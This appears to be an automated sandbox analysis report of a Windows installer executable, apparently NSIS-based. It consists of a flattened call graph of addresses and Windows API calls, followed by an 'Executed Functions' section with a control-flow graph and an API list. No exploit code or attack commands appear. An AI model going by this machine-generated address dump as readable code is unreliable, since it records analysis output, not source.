3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
